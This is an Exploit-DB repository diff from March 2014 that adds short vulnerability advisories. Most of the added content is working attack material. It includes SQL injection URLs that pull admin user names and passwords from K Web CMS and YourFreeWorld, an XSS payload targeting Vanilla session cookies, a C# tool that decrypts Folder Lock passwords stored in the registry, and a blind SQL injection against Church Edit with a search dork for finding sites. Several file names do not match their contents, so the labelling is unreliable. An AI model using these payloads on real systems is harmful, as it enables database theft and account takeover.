Updated 03_17_2014

Author: Offensive Security

files.csv

@@ -29050,4 +29050,8 @@ id,file,description,date,author,platform,type,port
 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 'index.php' Cross-Site Scripting Vulnerability",2008-08-18,"ThE dE@Th",php,webapps,0
 32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80
 32275,platforms/php/webapps/32275.txt,"itMedia Multiple SQL Injection Vulnerabilities",2008-08-18,baltazar,php,webapps,0
-32276,platforms/php/webapps/32276.txt,"SeedDMS 4.3.3 - Multiple Vulnerabilities",2014-03-14,"Craig Arendt",php,webapps,80
+32278,platforms/asp/webapps/32278.txt,"K Web CMS 'sayfala.asp' SQL Injection Vulnerability",2008-08-18,baltazar,asp,webapps,0
+32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0
+32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0
+32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0
+32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0

platforms/asp/webapps/32278.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/30745/info
+
+K Web CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/sayfala.asp?id=96+union+select+1,2,3,4,5,user_name,7+from+admin
+http://www.example.com/sayfala.asp?id=96+union+select+1,2,3,4,5,pass,7+from+admin 

platforms/php/webapps/31734.txt

@@ -20,7 +20,7 @@ Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
 
 2. Vulnerability no 2. (XSS):
 
-Go to this link: http://demo.pinacms.com/page.php?action=post.manage.home 
+Go to this link: http://target.com/page.php?action=post.manage.home 
 
 Apply this JavaScript on search bar
 

platforms/php/webapps/32276.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30748/info
+
+Vanilla is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+Vanilla 1.1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/people.php?PostBackAction=Apply&NewPassword='"><script>alert document.cookie)%3B<%2Fscript>

platforms/php/webapps/32279.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30762/info
+
+YourFreeWorld Ad-Exchange Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com.com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- 

platforms/php/webapps/32280.txt

@@ -0,0 +1,146 @@
+source: http://www.securityfocus.com/bid/30766/info
+
+Folder Lock is prone to an information-disclosure vulnerability because it stores credentials in an insecure manner.
+
+A local attacker can exploit this issue to obtain passwords used by the application, which may aid in further attacks.
+
+Folder Lock 5.9.5 is vulnerable; other versions may also be affected.
+
+/* 
+ * Folder Lock <= 5.9.5 Local Password Information Disclosure
+ * 
+ * Author(s): Charalambous Glafkos
+ *            George Nicolaou
+ * Date: June 19, 2008
+ * Site: http://www.astalavista.com
+ * Mail: [email protected]
+ *       [email protected]
+ *
+ * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
+ * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
+ * The security issue is caused due to the application storing access credentials within the Windows registry key:
+ * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. 
+ * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
+ * 
+ * Sample Output:
+ * 
+ * ASTALAVISTA the hacking & security community
+ * Folder Lock <= 5.9.5 Decrypter v2.0
+ * ---------------------------------
+ * Encrypted Password: :3<k_^62`4T-
+ * Decrypted Password: ,S3_15]^j;29
+ * 
+ */
+
+using System;
+using System.Text;
+using System.IO;
+using System.Threading;
+using Microsoft.Win32;
+
+namespace getRegistryValue
+{
+    class getValue
+    {
+        static void Main()
+        {
+            getValue details = new getValue();
+            Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n");
+            Console.WriteLine("Folder Lock <= 5.9.5  Decrypter v2.0");
+            Console.WriteLine("---------------------------------");
+            String strFL = details.getFL();
+            Console.WriteLine(strFL);
+            Thread.Sleep(5000);
+        }
+
+        private string getFL()
+        {
+            RegistryKey FLKey = Registry.CurrentUser;
+            FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false);
+            String _pack = FLKey.GetValue("_pack").ToString();
+            String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n"; 
+        return strFL;
+        }
+
+        public string Reverse(string x)
+        {
+            char[] charArray = new char[x.Length];
+            int len = x.Length - 1;
+            for (int i = 0; i <= len; i++)
+                charArray[i] = x[len - i];
+            return new string(charArray);
+        }
+
+        public static string Rotate(string toRotate)
+        {
+            char[] charArray = toRotate.ToCharArray();
+            for (int i = 0; i < charArray.Length; i++)
+            {
+                int thisInt = (int)charArray[i];
+                if (thisInt >= 65 && thisInt <= 91)
+                {
+                    thisInt += 25;
+                    if (thisInt >= 91)
+                    {
+                        thisInt -= 26;
+                    }
+                }
+
+                if (thisInt >= 92 && thisInt <= 96)
+                {
+                    thisInt += 25;
+                    if (thisInt >= 96)
+                    {
+                        thisInt -= 26;
+                    }
+                }
+
+
+                if (thisInt >= 32 && thisInt <= 47)
+                {
+                    thisInt += 25;
+
+                    if (thisInt >= 47)
+                    {
+                        thisInt -= 26;
+                    }
+                }
+
+               if (thisInt >= 48 && thisInt <= 57)
+                {
+                    thisInt += 25;
+
+                    if (thisInt >= 57)
+                    {
+                        thisInt -= 26;
+                    }
+                }
+
+                if (thisInt >= 58 && thisInt <= 64)
+                {
+                    thisInt += 25;
+
+                    if (thisInt >= 64)
+                    {
+                        thisInt -= 26;
+                    }
+                }
+
+               if (thisInt >= 97 && thisInt <= 123)
+                {
+                    thisInt += 25;
+
+                    if (thisInt >= 123)
+                    {
+                        thisInt -= 26;
+                    }
+                }
+
+
+               charArray[i] = (char)thisInt;
+            }
+            return new string(charArray);
+        }    
+    }
+}
+

platforms/php/webapps/32281.cs

@@ -0,0 +1,29 @@
+Exploit Title: Church Edit Blind SQL Injection
+Google Dork: inurl:This website is powered by Church Edit
+Date: 15/3/2013
+Exploit Author: ThatIcyChill
+Vendor Homepage: http://www.churchedit.co.uk/
+Version: Initial Release
+????????????????????????????????????????????????????????????????????
+
+The file "/photos/gallery.php" contains a Blind SQL
+Injection Vulnerability in the '?gallery_id=' variable in the URL.
+
+????????????????????????????????????????????????????????????????????
+GET /photos/gallery.php?gallery_id=1%20and%201=2&pg=1 HTTP/1.1
+Host: <>
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sat, 15 Mar 2014 17:42:40 GMT
+Server: Apache/2.2.3 (Red Hat)
+X-Powered-By: PHP/5.2.17
+Connection: close
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+????????????????????????????????????????????????????????????????????
+
+Sample injection - www.example.org/photos/gallery.php?gallery_id=1 AND SLEEP(5)&pg=1